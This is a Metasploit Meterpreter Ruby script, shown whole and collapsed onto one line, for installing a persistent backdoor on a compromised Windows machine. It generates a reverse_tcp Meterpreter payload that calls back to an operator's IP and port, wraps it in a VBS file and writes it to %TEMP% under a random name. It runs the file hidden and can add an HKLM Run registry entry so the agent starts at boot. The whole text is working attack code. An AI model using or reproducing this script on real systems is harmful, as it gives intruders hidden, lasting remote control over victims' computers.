# $Id$ # # Meterpreter script for installing a persistent meterpreter # session = client # # Options # opts = Rex::Parser::Arguments.new( "-h" => [ false, "This help menu"], "-r" => [ true, "The IP of the system running Metasploit listening for the connect back"], "-p" => [ true, "The port on the remote host where Metasploit is listening"], "-i" => [ true, "The interval in seconds between each connection attempt"], "-X" => [ false, "Automatically start the agent when the system boots"], "-A" => [ false, "Automatically start a matching multi/handler to connect to the agent"] ) # # Default parameters # rhost = Rex::Socket.source_address("") rport = 4444 delay = 5 install = false autoconn = false ## # # Option parsing # opts.parse(args) do |opt, idx, val| case opt when "-h" print_line(opts.usage) return when "-r" rhost = val when "-p" rport = val.to_i when "-i" delay = val.to_i when "-X" install = true when "-A" autoconn = true end end # # Create the persistent VBS # print_status("Creating a persistent agent: LHOST=#{rhost} LPORT=#{rport} (interval=#{delay} onboot=#{install})") pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp") pay.datastore['LHOST'] = rhost pay.datastore['LPORT'] = rport raw = pay.generate vbs = ::Msf::Util::EXE.to_win32pe_vbs(client.framework, raw, {:persist => true, :delay => 5}) print_status("Persistent agent script is #{vbs.length} bytes long") # # Upload to the filesystem # tempdir = client.fs.file.expand_path("%TEMP%") tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs" fd = client.fs.file.new(tempvbs, "wb") fd.write(vbs) fd.close print_status("Uploaded the persistent agent to #{tempvbs}") # # Execute the agent # proc = session.sys.process.execute("wscript #{tempvbs}", nil, {'Hidden' => true}) print_status("Agent executed with PID #{proc.pid}") # # Setup the multi/handler if requested # if(autoconn) mul = client.framework.exploits.create("multi/handler") mul.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp" mul.datastore['LHOST'] = rhost mul.datastore['LPORT'] = rport mul.datastore['EXITFUNC'] = 'process' mul.datastore['ExitOnSession'] = false mul.exploit_simple( 'Payload' => mul.datastore['PAYLOAD'], 'RunAsJob' => true ) end # # Make the agent restart on boot # if(install) nam = Rex::Text.rand_text_alpha(rand(8)+8) print_status("Installing into autorun as HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{nam}") key = client.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'Software\Microsoft\Windows\CurrentVersion\Run', KEY_WRITE) if(key) key.set_value(nam, session.sys.registry.type2str("REG_SZ"), tempvbs) print_status("Installed into autorun as HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{nam}") else print_status("Error: failed to open the registry key for writing") end end